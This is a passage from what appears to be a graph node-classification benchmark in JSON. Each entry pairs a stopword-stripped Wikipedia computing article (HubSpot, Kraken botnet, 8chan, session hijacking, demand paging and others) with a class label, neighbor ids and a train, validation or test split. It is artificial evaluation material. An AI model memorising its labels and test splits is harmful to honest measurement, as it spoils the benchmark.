relationships metcalfe law terms describing relationship network one read related tongia wilson also examine related question costs excluded despite many arguments metcalfe law real data based evidence available 30 years july 2013 dutch researchers managed analyze european internet usage patterns long enough time found n proportionality small values n n log n proportionality large values n months later metcalfe provided proof used facebook data past 10 years show good fit metcalfe law model n 2015 zhang liu xu extend metcalfe results utilizing data tencent china largest social network company facebook work showed metcalfe law held despite difference audience two sites facebook serving worldwide audience tencent serving chinese users metcalfe functions two sites given paper formula_4 formula_5 respectively 2018 peterson applied metcalfe law cryptocurrency bitcoin showed metcalfe law determined 70 bitcoin value yet unpublished work peterson provided mathematical derivation linked traditional time-value-of-money concepts metcalfe value used bitcoin facebook numerical examples proof",
    "neighbors": [
      6656,
      2273,
      11298,
      5798,
      5802,
      8367,
      9967,
      785,
      1778,
      6801,
      7006,
      119,
      153,
      574,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 79,
    "label": 8,
    "text": "HubSpot:hubspot hubspot developer marketer software products inbound marketing sales founded brian halligan dharmesh shah 2006 products services aim provide tools social media marketing content management web analytics search engine optimization hubspot founded brian halligan dharmesh shah massachusetts institute technology mit 2006 company grew 255,000 revenues 2007 15.6 million 2010 later year hubspot acquired oneforty twitter app store founded laura fitton company also introduced new software personalizing websites visitor according forbes hubspot started targeting small companies moved steadily upmarket serve larger businesses 1000 employees hubspot filed initial public offering securities exchange commission august 25 2014 requesting listed new york stock exchange ticker symbol hubs july 2017 hubspot acquired kemvi applies artificial intelligence machine learning help sales teams hubspot provides tools social media marketing content management web analytics landing pages customer support search engine optimization hubspot integration features salesforce.com sugarcrm netsuite microsoft dynamics crm others also third-party services templates extensions additionally hubspot offers consulting services online resource academy learning inbound marketing tactics also hosts user group conferences inbound marketing certification programs hubspot promotes inbound marketing concepts marketing called prolific creator content blogs social media webinars white papers 2010 article harvard business review said hubspot effective inbound marketing feature free online tools one tool marketing grader assessed scored website performance company introduced twitter tracking feature 2011 2018 hubspot integrated taboola dashboard global pay-per-click native ad network company launched hubspot crm free 2014 crm product tracks manages interactions company customers prospects enables companies forecast revenue measure sales team productivity report revenue sources software service product free integrates gmail g suite microsoft office windows software hubspot described unique strives provide customers all-in-one approach 2012 review crm search said hubspot best business solution category taken whole best marketing solution combined many tools one package identified hubspot strengths sophistication call action cta tool online ecosystem ease use weakness described breadth depth review said lack customization design tools could limiting missing advanced features business process management bpm tools manage workflow hubspot hosts annual marketing conference hubspot users partners called inbound conference typically located boston 2018 largest conferences event history record 24,000 attendees july 2015 hubspot cmo mike volpe dismissed violating hubspot ’ code business conduct found tried obtain draft copy book written former employee daniel lyons according article boston globe records obtained freedom information act indicated hubspot executives considered book financial threat hubspot volpe used tactics email hacking extortion attempt prevent book published april 2016 book published lyons wrote new york times hubspot frat house atmosphere also called company digital sweatshop workers little job security later month hubspot founders gave official response book addressed several lyons claims boston business journal named hubspot best place work 2012 2015 company named best large company work massachusetts boston globe 2017 hubspot named 7th cnbc one best places work 2018",
    "neighbors": [
      1539,
      8639,
      10090,
      6797,
      6576,
      467,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 80,
    "label": 9,
    "text": "Tom_Knight_(scientist):tom knight scientist tom knight american synthetic biologist computer engineer formerly senior research scientist mit computer science artificial intelligence laboratory part mit school engineering works synthetic biology company ginkgo bioworks cofounded 2008 tom knight arrived mit fourteen even though started undergraduate studies regular age 18 took classes computer programming organic chemistry high school lived close university built early hardware arpanet interfaces host 6 network first bitmapped displays time sharing system lisp machines also instrumental releasing version operating system lisp machine bsd license connection machine parallel symbolic processing computer systems 1967 knight wrote original kernel operating system well combination command processor debugger used top-level user interface dominant operating system first project mac later mit artificial intelligence laboratory mit laboratory computer science ran pdp-6 later pdp-10 computers 1968 knight designed supervised construction first pdp-10 arpanet interfaces bob metcalfe 1972 knight designed one first semiconductor memory-based bitmap displays later commercialized led directly development bedford computer systems newspaper layout system influenced many bitmapped display devices available today year along jeff rubin knight designed implemented network file system provided first transparent remote file access arpanet 1974 knight designed implemented prototype version mit lisp machine processor production version following 1976 lisp machine microprogrammed machine tuned high-performance emulation instruction sets design lisp machine directly implemented symbolics lmi basis computers texas instruments implemented surface mount single-chip versions architecture 1983 1987 respectively knight collaborated jack holloway designing implementing chaosnet re-engineered version xerox 3 mbit/s ethernet 1975 network became first local area network mit campus chaosnet innovation preamble bit string packets eventually incorporated 10 mbit/s ethernet standard 1980 knight participated development connection machine architecture original implementation notable diverse accomplishments 1980s included creation first silicon retina 1981 creation single-chip optical mouse design cross-omega interconnection network architecture design transit multiprocessor interconnection architecture early 1990s knight involved formation permabit exa corporation architecture latter initial version fx/1 lattice gas parallel fluid flow computer advances included using over-relaxation techniques make 10x algorithmic improvements lattice gas computations landmark cfd accuracies correction misconceptions origin fluid turbulence simple two-dimensional flow situations within laboratory computer science led abacus simd project worked vlsi microdisplays made advances field adiabatic reversible computing also period knight interests biological systems began inspired part work harold j. morowitz yale physicist biologist knight studied biochemistry genetics cellular biology set biology lab within mit ai laboratory lab created concept biobrick plasmid dna part began creating library biobricks could used simplify genetic engineering escherichia coli cells today biobricks form basis enormous annual igem international genetically engineered machine competition knight sometimes referred godfather synthetic biology knight co-founded ginkgo bioworks synthetic biology company",
    "neighbors": [
      4992,
      1382,
      10104,
      1147,
      989
    ],
    "mask": "Train"
  },
  {
    "node_id": 81,
    "label": 4,
    "text": "Kraken_botnet:kraken botnet kraken botnet network hacking spyware program attacks microsoft windows apple macintosh systems email world wide web sites social networking sites world largest botnet researchers say kraken infected machines least 50 fortune 500 companies grew 400,000 bots estimated send 9 billion spam messages per day kraken botnet malware may designed evade anti-virus software employed techniques stymie conventional anti-virus software",
    "neighbors": [
      3072,
      10756,
      3724,
      6797,
      3347,
      4883,
      2325,
      278,
      10392,
      9630,
      10657,
      4648,
      939,
      46,
      10297,
      3643,
      7739,
      7996,
      11583,
      9664,
      9154,
      8133,
      10952,
      8789,
      10457,
      7515,
      988,
      3807,
      8032,
      3941,
      10477,
      4462,
      119,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Test"
  },
  {
    "node_id": 82,
    "label": 8,
    "text": "8chan:8chan 8chan also called infinitechan infinitychan stylized ∞chan imageboard website composed user-created message boards owner moderates board zero interaction site administration unaffiliated imageboard 4chan site linked harmful activism particular alt-right well multiple mass shootings site also known presence child pornography result filtered google search several site boards played active role gamergate controversy encouraging gamergate affiliates frequent 8chan 4chan banned topic 8chan 3,832nd visited site world received average 35,000 unique visitors per day 400,000 posts per week aftermath back-to-back mass shootings august 3 august 4 2019 el paso texas dayton ohio respectively site taken clearnet august 5 2019 network infrastructure provider cloudflare stopped providing content delivery network service voxility web services company renting servers epik site new cdn provider brand bitmitigate also terminated service shortly el paso shooting four-page message justifying attack posted 8chan police stated reasonably confident posted perpetrator 8chan created october 2013 computer programmer fredrick brennan better known alias hotwheels brennan created website observed perceived rapidly escalating surveillance loss free speech internet brennan considers imageboard 4chan grown authoritarianism describes 8chan free-speech-friendly alternative originally conceptualized site experiencing psychedelic mushrooms trip experience programming knowledge necessary users create boards since early march 2014 faq stated one rule globally enforced post request link content illegal united states america create boards sole purpose posting spreading content brennan claimed finds content posted users reprehensible feels personally obligated uphold site integrity tolerating discussion necessarily support regardless moral stance brennan agreed partner 8chan japanese message board 2channel subsequently relocated philippines october 2014 january 2015 site changed domain 8chan.co 8ch.net multiple people filed reports complaining 8chan registrar message board hosted child pornography despite subsequently regaining domain site remained 8ch.net old domain redirecting numerous bugs infinity software led funding development successor platform dubbed infinity next several-month-long testing period migration new software attempted december 2015 failed january 2016 development halted main developer joshua moon fired brennan brennan officially resigned july 2016 turning site owner jim watkins son ron cited failure infinity next project disillusionment 8chan become reasons following three shootings 2019 christchurch new zealand march poway california april el paso texas august perpetrators used 8chan platform spread manifesto increased pressure providing 8chan internet services terminate support matthew prince ceo cloudflare initially defended firm technological support 8chan august 3 2019 day el paso shooting happened el paso today abhorrent every possible way ugly hate association us … us question worse evil however next day august 4 increasing press attention cloudflare changed position rescinded support 8chan effective midnight august 5 pacific time potentially leaving site open denial service attacks prince stated unfortunately action take today wo n't fix hate online ... almost certainly even remove 8chan internet right thing cloudflare blog wrote 8chan among 19 million internet properties use cloudflare service sent notice terminating 8chan customer effective midnight tonight pacific time rationale simple proven lawless lawlessness caused multiple tragic deaths even 8chan may violated letter law refusing moderate hate-filled community created environment revels violating spirit brennan creator 8chan ceased owner 2015 ceased working website 2018 stated august 4 2019 8chan shut subsequently thanked cloudflare decision pull 8chan support tucows also terminated support 8chan domain name registrar effectively making site difficult access wake cloudflare tucows changes 8chan switched domain register bitmitigate division epik provider previously serviced right-wing sites like gab daily stormer 8chan moved epik company ceo rob monster wrote freedom speech expression fundamental rights free society enter slippery slope start limit speech makes us uncomfortable however voxility company provided bitmitigate epik servers internet connectivity took steps stop leasing servers bitmitigate taking site offline stating intended use servers violated acceptable use policy monster changed decision provide content hosting 8chan soon company removal voxility although ars technica noted company begun providing 8chan dns services reported august 6 2019 united states house committee homeland security called owner watkins american living philippines testify website efforts tackle proliferation extremist content including white supremacist content numerous controversies related content posted 8chan arisen extent participation individuals companies website cause controversy february 25 2019 thq nordic hosted ama ask anything thread video games board website /v/ later apologized september 18 2014 8chan became entangled gamergate controversy 4chan banned discussion gamergate whereupon 8chan became one several hubs gamergate activity 8chan initial gamergate-oriented board also gained attention compromised members internet troll group gay nigger association america forcing gamergate activists migrate /gamergate/ replacement quickly became site second-most accessed board january 2015 site used base swatting exploits portland seattle burnaby british columbia tied victims criticism gamergate 8chan association attacks coordinated board website called /baphomet/ one victims swatting attack said singled followed someone twitter february 9 2015 contents /baphomet/ subboard wiped personal information katherine forrest presiding judge silk road case posted 2019 post threatening mass shooting bethel park high school posted 8chan result 18-year-old individual arrested charged one count terroristic threats one count retaliation witness victim boards created discuss topics child rape sharing illegal content site rules daily dot wrote boards exist share sexualized images minors provocative poses users boards post links explicit child pornography hosted elsewhere asked whether boards inevitable result free speech brennan responded unfortunately yes ’ support content boards mentioned simply cost free speech active site impose 'laws passed washington d.c. august 2015 8chan blacklisted google search google described content constituting suspected child abuse content july 2016 u.s. presidential candidate donald trump tweeted image hillary clinton background money six-pointed star seen resembling star david containing message corrupt candidate ever image posted 8chan /pol/ board early june 22 week trump team tweeted 2018 user referred q gained attention promoted conspiracy theories deep state eventually leading international movement sean hannity retweeted qanon hashtags twitter feed original group q followers reddit banned march 14 2018 promotion theory quickly regrouped new subreddit featured posts q anonymous posters 8chan reader-friendly format subreddit banned second time september 12 2018 flood new users board q asked ron upgrade website servers order accommodate board website traffic september 19 2018 movement linked pizzagate conspiracy theory q movement also linked hashtags thegreatawakening wwg1wga stands go one go also sometimes linked phrase follow white rabbit september 2018 louisiana state police scrutinized using hoax list personal information supposed antifascist antifa activists originally posted 8chan politics board document dubbed full list antifa.docx police officers actually contained names several thousand people signed online petitions president donald trump state police refused disclose list claiming would compromise ongoing criminal investigations expects arrests lawsuit louisiana state police filed behalf record requester harvard lecturer former public defender thomas frampton alleging police refusal release list indicates actually believed credibility hoax list used investigatons litigations perpetrators christchurch mosque shootings poway synagogue shooting el paso shooting 2019 used 8chan spread manifesto result increased pressure providing 8chan internet services terminate support led services companies withdrawal providing cdn domain registry taking website clearnet prior shootings al noor mosque linwood islamic centre christchurch new zealand march 15 2019 australia-born terrorist brenton harrison tarrant posted links 17-minute facebook live video first attack al noor mosque white nationalist neo-fascist manifesto great replacement named french far-right theory name writer renaud camus detailing anti-islamic anti-immigration reasons attack shootings ensued left 51 dead 50 injured shooter shared links live stream video minutes attack 8chan facebook members 8chan re-shared applauded violent murders march 20 2019 australian telecom companies telstra optus vodafone denied millions australians access websites 4chan 8chan zero hedge liveleak reaction christchurch mosque shootings john t. earnest alleged perpetrator poway synagogue shooting chabad poway poway california april 27 2019 escondido mosque fire islamic center escondido escondido california march 25 2019 posted links open letter attempted livestream 8chan earnest also named place radicalization according 8chan twitter shooter post removed nine minutes creation patrick crusius allen texas alleged perpetrator 2019 el paso shooting walmart store el paso texas august 3 2019 posted four-page white nationalist manifesto inconvenient truth 8chan less hour shooting began 8chan moderators quickly removed original post though users continued circulate links manifesto",
    "neighbors": [
      8640,
      10368,
      9762,
      10726,
      8331,
      9965,
      4753,
      9554,
      10995,
      8244,
      5526,
      9240,
      441,
      8956,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 83,
    "label": 1,
    "text": "Microsoft_Analysis_Services:microsoft analysis services microsoft sql server analysis services ssas online analytical processing olap data mining tool microsoft sql server ssas used tool organizations analyze make sense information possibly spread across multiple databases disparate tables files microsoft included number services sql server related business intelligence data warehousing services include integration services reporting services analysis services analysis services includes group olap data mining capabilities comes two flavors multidimensional tabular 1996 microsoft began foray olap server business acquiring olap software technology canada-based panorama software two years later 1998 microsoft released olap services part sql server 7 olap services supported molap rolap holap architectures used ole db olap client access api mdx query language could work client-server mode offline mode local cube files 2000 microsoft released analysis services 2000 renamed olap services due inclusion data mining services analysis services 2000 considered evolutionary release since built architecture olap services therefore backward compatible major improvements included flexibility dimension design support parent child dimensions changing dimensions virtual dimensions another feature greatly enhanced calculation engine support unary operators custom rollups cell calculations features dimension security distinct count connectivity http session cubes grouping levels many others 2005 microsoft released next generation olap data mining technology analysis services 2005 maintained backward compatibility api level although applications written ole db olap mdx continued work architecture product completely different major change came model form udm unified dimensional model key events history microsoft analysis services cover period starting 1996 microsoft analysis services takes neutral position molap vs. rolap arguments among olap products allows flavors molap rolap holap used within model microsoft analysis services supports different sets apis object models different operations different programming environments microsoft analysis services supports following query languages ddl analysis services xml based supports commands create alter delete process data mining models import export also supports pmml",
    "neighbors": [
      2183,
      6797,
      10900,
      10902,
      11030,
      3224,
      5401,
      7064,
      11414,
      4384,
      8227,
      11683,
      11559,
      4010,
      1964,
      10157,
      10413,
      7983,
      9263,
      11570,
      6709,
      8246,
      315,
      7486,
      4674,
      1347,
      1348,
      5320,
      6348,
      4174,
      847,
      1366,
      9434,
      603,
      1501,
      479,
      608,
      736,
      2401,
      7523,
      8161,
      3303,
      11498,
      3821,
      10991,
      3573,
      9205,
      5754,
      2045,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 84,
    "label": 8,
    "text": "AppJet:appjet appjet website let users create web-based applications client web browser client software appjet founded 3 mit graduates 2 engineers google starting appjet launched initial public beta december 12 2007 allowing anyone create web app appjet received funding combinator summer 2007 project closed 1 july 2009 focus attention etherpad product appjet acquired google december 4 2009 undisclosed amount jgate cloud-based service beta free jan 2011 allows appjet applications run august 14 2008 appjet released programming tutorial aimed absolute beginners tutorial used appjet ide provide programming sandbox examples allowing readers experiment sample code one first online tutorials embed ide exposing complete server-side web app framework inline text appjet also refers server-side javascript framework powers appjet applications example recent trend web development run javascript client server allowing developers code entire web apps one language instead using separate language server-side client-side scripting virtual machine powers appjet apps based java virtual machine using rhino javascript implementation scala libraries also used appjet often updated bug-fixes improvements features major update site graphical change implemented july 10 2008 update also added feature comment users apps comments messages apps left url comments.appname.appjet.net another update occurred may 2 2008 update lets apps hosted custom domains",
    "neighbors": [
      1920,
      1409,
      259,
      3462,
      6791,
      8582,
      10507,
      2062,
      9614,
      148,
      1812,
      8854,
      4378,
      8605,
      9245,
      7455,
      10526,
      8739,
      3876,
      4777,
      5165,
      3761,
      4529,
      7987,
      692,
      8883,
      438,
      11060,
      5048,
      6074,
      5311,
      2880,
      7871,
      9152,
      9666,
      8644,
      1353,
      4171,
      11087,
      339,
      595,
      4822,
      4056,
      9560,
      603,
      6493,
      482,
      5219,
      7396,
      102,
      487,
      8554,
      5483,
      9195,
      10991,
      10097,
      8691,
      3705,
      11259,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 85,
    "label": 6,
    "text": "Synkron:synkron synkron open-source multiplatform utility designed file synchronization two folders supporting synchs across computers written c++ uses qt4 libraries synkron distributed terms gpl v2 apart carrying synchronisations synkron provides features user interface synkron divided several sections synchronise multisync syncview scheduler restore blacklist filters user switch sections using toolbar multisync supports synching multiple folders one folder synkron available portable app installed software repositories major kde linux distributions",
    "neighbors": [
      7983,
      6797,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 86,
    "label": 2,
    "text": "Demand_paging:demand paging computer operating systems demand paging opposed anticipatory paging method virtual memory management system uses demand paging operating system copies disk page physical memory attempt made access page already memory i.e page fault occurs follows process begins execution none pages physical memory many page faults occur process working set pages located physical memory example lazy loading technique demand paging follows pages brought memory executing process demands often referred lazy evaluation pages demanded process swapped secondary storage main memory contrast pure swapping memory process swapped secondary storage main memory process startup commonly achieve process page table implementation used page table maps logical memory physical memory page table uses bitwise operator mark page valid invalid valid page one currently resides main memory invalid page one currently resides secondary memory process tries access page following steps generally followed demand paging opposed loading pages immediately",
    "neighbors": [
      2304,
      1025,
      5120,
      1795,
      11655,
      6536,
      4747,
      3725,
      5008,
      9490,
      11539,
      8474,
      541,
      3615,
      3871,
      1954,
      9893,
      3241,
      557,
      814,
      7728,
      2995,
      9141,
      3512,
      8379,
      2625,
      1474,
      4423,
      1736,
      4424,
      2250,
      6730,
      8136,
      6221,
      11596,
      5840,
      8273,
      5074,
      6868,
      9300,
      5080,
      1247,
      6624,
      8545,
      2152,
      7403,
      8301,
      5363,
      634,
      8573,
      7039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 87,
    "label": 4,
    "text": "Session_hijacking:session hijacking computer science session hijacking sometimes also known cookie hijacking exploitation valid computer session—sometimes also called session key —to gain unauthorized access information services computer system particular used refer theft magic cookie used authenticate user remote server particular relevance web developers http cookies used maintain session many web sites easily stolen attacker using intermediary computer access saved cookies victim computer see http cookie theft successfully stealing appropriate session cookies adversary might use pass cookie technique perform session hijacking popular method using source-routed ip packets allows attacker point b network participate conversation c encouraging ip packets pass b machine source-routing turned attacker use blind hijacking whereby guesses responses two machines thus attacker send command never see response however common command would set password allowing access elsewhere net attacker also inline c using sniffing program watch conversation known man-in-the-middle attack http protocol versions 0.8 0.9 lacked cookies features necessary session hijacking version 0.9beta mosaic netscape released october 13 1994 supported cookies early versions http 1.0 security weaknesses relating session hijacking difficult exploit due vagaries early http 1.0 servers browsers http 1.0 designated fallback http 1.1 since early 2000s—and http 1.0 servers essentially http 1.1 servers session hijacking problem evolved nearly permanent security risk introduction supercookies features modernized http 1.1 allowed hijacking problem become ongoing security problem webserver browser state machine standardization contributed ongoing security problem four main methods used perpetrate session hijack successfully acquiring appropriate session cookies adversary might leverage pass cookie technique perform session hijacking october 2010 mozilla firefox extension called firesheep released made easy session hijackers attack users unencrypted public wi-fi websites like facebook twitter user adds preferences allow firesheep user easily access private information cookies threaten public wi-fi user personal property months later facebook twitter responded offering later requiring http secure throughout app named whatsapp sniffer made available google play may 2012 able display messages whatsapp users connected network app user time whatsapp used xmpp infrastructure encryption plain-text communication droidsheep simple android tool web session hijacking sidejacking listens http packets sent via wireless 802.11 network connection extracts session id packets order reuse droidsheep capture sessions using libpcap library supports open unencrypted networks wep encrypted networks wpa/wpa2 encrypted networks psk software uses libpcap arpspoof apk made available google play taken google cookiecadger graphical java app automates sidejacking replay http requests help identify information leakage applications use unencrypted get requests cross-platform open-source utility based wireshark suite monitor wired ethernet insecure wi-fi load packet capture file offline analysis cookie cadger used highlight weaknesses youth team sharing sites shutterfly used ayso soccer league teamsnap methods prevent session hijacking include",
    "neighbors": [
      10242,
      6295,
      5404,
      7965,
      2470,
      4522,
      9771,
      3629,
      5935,
      5435,
      5827,
      10309,
      6345,
      842,
      7370,
      11345,
      7515,
      8413,
      225,
      10466,
      4198,
      6504,
      8699,
      3707,
      6013,
      4863
    ],
    "mask": "Train"
  },
  {
    "node_id": 88,
    "label": 8,
    "text": "Cacoo_(software):cacoo software cacoo web software used designing drawing diagrams cacoo launched 2009 nulab inc 2013 on-premise enterprise version software launched cacoo written html5 runs major window browsers mac operating systems cacoo used creating flowcharts wireframes uml diagrams organizational charts network diagrams",
    "neighbors": [
      1435
    ],
    "mask": "None"
  },
  {
    "node_id": 89,
    "label": 2,
    "text": "Damn_Vulnerable_Linux:damn vulnerable linux damn vulnerable linux dvl discontinued linux distribution geared toward computer security students functioned tool observing studying vulnerabilities linux kernel popular user space software available live dvd could run virtual machine within host operating system dvl created thorsten schneider founder teutohack laboratory bielefeld university use training system university lectures dvl slax-based distribution uses slackware .tgz package management system uses outdated versions various software deliberately make vulnerable operating system ever dvl distributed live cd allowing booted directly distribution medium without installation pc within virtual machine",
    "neighbors": [
      5636,
      8837,
      7435,
      10127,
      2321,
      4887,
      1150,
      10394,
      10016,
      673,
      3745,
      10530,
      6436,
      9253,
      10149,
      11305,
      7854,
      7983,
      9646,
      2738,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 90,
    "label": 4,
    "text": "WS-Security_based_products_and_services:ws-security based products services ws-security flexible feature-rich extension soap apply security web services member ws-* family web service specifications published oasis closely related ws-security ws-trust also ws-* specification oasis standard provides extensions ws-security following ws-security based products services",
    "neighbors": [
      3521,
      10020,
      8425,
      4979,
      6811,
      8159
    ],
    "mask": "Validation"
  },
  {
    "node_id": 91,
    "label": 4,
    "text": "Hardware_backdoor:hardware backdoor hardware backdoors backdoors hardware code inside hardware firmware computer chips backdoors may directly implemented hardware trojans integrated circuit hardware backdoors intended undermine security smartcards cryptoprocessors unless investment made anti-backdoor design methods also considered car hacking hardware backdoors considered highly problematic skorobogatov developed technique capable detecting malicious insertions chips new york university tandon school engineering researchers developed way corroborate chip operation using verifiable computing whereby manufactured sale chips contain embedded verification module proves chip calculations correct associated external module validates embedded verification module another technique developed researchers university college london ucl relies distributing trust multiple identical chips disjoint supply chains assuming least one chips remains honest security device preserved",
    "neighbors": [
      11584,
      2213,
      3495,
      107,
      1515,
      5389,
      3825,
      7794,
      9745,
      7893,
      8726,
      7354,
      10909,
      7614
    ],
    "mask": "Test"
  },
  {
    "node_id": 92,
    "label": 9,
    "text": "WinWrap_Basic:winwrap basic winwrap basic wwb polar engineering inc. third-party macro language based visual basic used programmes various types vendor touts alternative activex e.g vbscript jscript perlscript rexx-based wsh engines others visual basic applications vsta purpose wwb software package used conjunction microsoft development tools including visual studio visual studio.net activex scripting engines default file extension programmes written language .wwb wwb 10 windows scripting host functionality i.e contains scripting engine similar default third-party language implementations wsh engine able access .net framework component object model current version 10.01 available different combinations os platform time four types wwb wwb.net .net object model used visual studio.net 2005 2008 vista .wwb-com com object model visual studio visual studio.net earlier versions used windows 32 64-bit operating systems windows 95 windows vista two packages windows ce pocketpc windows mobile earlier versions wwb ran windows 3.1 ostensibly os/2 warp 3 well wwb integrated many software packages including categories pc server software e.g earlier versions host explorer uses two proprietary scripting languages hummingbird quickscript hummingbird basic well software used run various types equipment like mass spectrometers lab equipment",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      11683,
      5925,
      8101,
      4136,
      10026,
      10666,
      8494,
      303,
      7343,
      9780,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      8262,
      712,
      847,
      1879,
      603,
      11229,
      2915,
      9188,
      5733,
      11243,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 93,
    "label": 2,
    "text": "Login_session:login session computing login session period activity user logging logging multi-user system unix unix-like operating systems login session takes one two main forms windows nt-based systems login sessions maintained kernel control within purview local security authority subsystem service lsa codice_1 responds secure attention key requests lsa create login sessions login terminates processes belonging login session logout",
    "neighbors": [
      3394,
      3235,
      8418,
      4552,
      4750,
      7983,
      8976,
      2801,
      5435,
      10673,
      5492,
      5397,
      10926,
      3351,
      1113,
      9466,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 94,
    "label": 4,
    "text": "Tufin:tufin tufin security policy management company specializing automation security policy changes across hybrid platforms improving security compliance tufin orchestration suite supports next-generation firewalls network layer firewalls routers network switches load balancers web proxies private public cloud platforms microservices tufin founded ruvi kitov reuven harrison formerly check point 2005 sales support offices north america europe asia-pacific company global headquarters tel aviv israel june 2017 company announced opening united states headquarters boston massachusetts company works 400 channel partners throughout world serves 2,000 customers every industry including finance telecom energy utilities healthcare retail education government manufacturing transportation auditing prior 2019 initial public offering tufin privately funded reports continuous growth since establishment tufin develops markets tufin orchestration suite consists keep changing needs customers company releases updates tufin orchestration suite quarter 2018 tufin launched tufin orca security automation containers microservices cloud-based solution enables users extend tufin policy-based approach secure containers microservices tufin recently launched tufin iris security policy management public clouds tufin iris helps cloud operation security teams regain visibility control security policies technology built make network security manageable large organizations company technology analyzes maps network topology security policies automates configuration changes enforces global security policy ensures continuous compliance across virtual physical hybrid networks suite designed large enterprises well managed security service providers mssp security auditors tufin products help security teams implement maintain security policy firewalls routers network switches accelerate service delivery network change automation expedite process compliance audits security standards pci dss nerc sarbanes oxley tufin products also help companies manage automate daily configuration changes network security devices tufin orchestration suite vendor agnostic providing integrations network ticketing security vendors well rest apis suite easily scales demands enterprise tufin innovation includes several technologies automatic policy generator refines security rules based network traffic methods automating security policy management concept managing network security policies application scope tufin core technology protected multiple us patents network security vendors provide operations management auditing change automation tufin products tufin technology partners include check point cisco fortinet juniper networks mcafee palo alto networks stonesoft f5 networks vmware openstack amazon web services aws microsoft azure bmc servicenow puppet labs others",
    "neighbors": [
      704,
      4194,
      4388,
      8998,
      6153,
      2539,
      10574,
      1935,
      7248,
      3732,
      4725,
      11577,
      5178,
      8668
    ],
    "mask": "Validation"
  },
  {
    "node_id": 95,
    "label": 3,
    "text": "California_Games:california games california games 1987 epyx sports video game originally released apple ii commodore 64 ported home computers video game consoles branching popular summer games winter games series game consists collection outdoor sports purportedly popular california game successful epyx spawned sequel events available vary slightly depending platform include following several members development team moved projects chuck sommerville designer half-pipe game california games later developed game chip challenge ken nicholson designer footbag game inventor technology used microsoft directx kevin norman designer bmx game went found educational science software company norman globus makers electrowiz series products sound design original version california games done chris grigg member band negativland originally written apple ii commodore 64 eventually ported amiga apple ii atari 2600 atari st ms-dos genesis amstrad cpc zx spectrum nintendo entertainment system msx master system atari lynx version pack-in game system launched 1989 300,000 copies sold first nine months california games most-successful epyx game outselling four previous two subsequent titles company games series ceo david shannon morse stated first epyx game appeal equally boys girls playtesting computer gaming world recommended game calling fun compute called california games inventive charming game reviewed 1988 dragon 129 hartley patricia kirk lesser role computers column reviewers gave game 4½ 5 stars capsule review start clayton walnum said california games n't bad package especially since comes free lynx found bmx surfing events great fun deemed skateboarding event frustrating said foot-bag event pleasant quickly wears thin game followed 1990 california games ii sequel failed match original success recently game released mobile phones java format current rights holders system 3 ceo mark cale stated game available future retail product on-line product sony playstation 3 nintendo wii nintendo ds commodore 64 version released wii virtual console service europe april 11 2008 north america july 6 2009",
    "neighbors": [
      9026,
      8484,
      2984,
      8361,
      8937,
      9006,
      9166,
      4856,
      9951,
      4152,
      9627,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 96,
    "label": 2,
    "text": "Data_General_AOS:data general aos aos name family operating systems data general 16-bit eclipse c minicomputers followed aos/vs aos/rt32 1980 later aos/vs ii 1988 32-bit eclipse mv line aos/vs exploited 8-ring protection architecture eclipse mv hardware ring 7 least privileged ring 0 privileged aos/vs kernel ran ring 0 used ring-1 addresses data structures related virtual address translations ring 2 unused reserved future use kernel agent performed much system call validation aos/vs kernel well i/o buffering many compatibility functions ran ring 3 process ring 4 used various d.g products infos ii dbms rings 5 6 reserved use user programs rarely used except large software mv/ux inner-ring emulator oracle used ring 5 user programs ran ring 7 aos software far advanced competing pdp-11 operating systems 16-bit aos applications ran natively aos/vs aos/vs ii 32-bit eclipse mv line aos/vs advanced operating system/virtual storage commonly used dg software product included command-line interpreter cli allowing complex scripting dump/load custom components 16-bit version cli famous including easter egg taken directly colossal cave adventure game user typing command xyzzy would get back response cli nothing happens 32-bit version cli became available aos/vs ii command instead reported twice much happens modified version system v.2 unix called mv/ux hosted aos/vs also available modified version system v unix called dg/ux made eclipse mv line later 88k x86 aviion machines aos aos/vs kernels written entirely assembly language almost aos aos/vs utilities included operating system releases written variants pl/i programming language initially aos/vs utilities closely tracked aos source development aos/vs matured many dg-supplied utilities rewritten take advantage 32-bit address space reduce dependencies assembly language often resulting substantial increases functionality performance reliability compared aos ancestors",
    "neighbors": [
      2179,
      10340,
      8902,
      7983,
      6289,
      1971,
      499,
      5492,
      5046,
      8502,
      3418,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 97,
    "label": 2,
    "text": "Harmony_OS:harmony os harmony os styled harmonyos upcoming open source microkernel-based distributed operating system similar qnx google fuchsia developed huawei unveiled 9 august 2019 platform designed primarily internet things iot devices prior unveiling originally speculated mobile operating system could replace android future huawei devices response financial sanctions imposed huawei united states government may 2019 july 2019 huawei executives describing harmony industrial embedded operating system designed iot hardware discarding previous statements mobile operating system reports surrounding in-house operating system developed huawei date back far 2012 intensified may 2019 huawei subjected export restrictions united states government violations united states sanctions iran huawei executive richard yu described in-house platform plan b case prevented using android future smartphone products media outlets reported os referred hongmeng os could released china either august september 2019 worldwide release second quarter 2020 24 may 2019 huawei registered hongmeng os trademark china day huawei registered trademarks surrounding ark os variants european union intellectual property office july 2019 reported huawei also registered trademarks surrounding word harmony desktop mobile operating system software indicating either different name component os name hongmeng came chinese mythology symbolizes primordial chaos world creation july 2019 huawei chairman liang hua stated os intended industrial use huawei decided yet hongmeng os developed smartphone operating system future preferring continued use android devices building upon statement huawei senior vice president catherine chen stated embedded 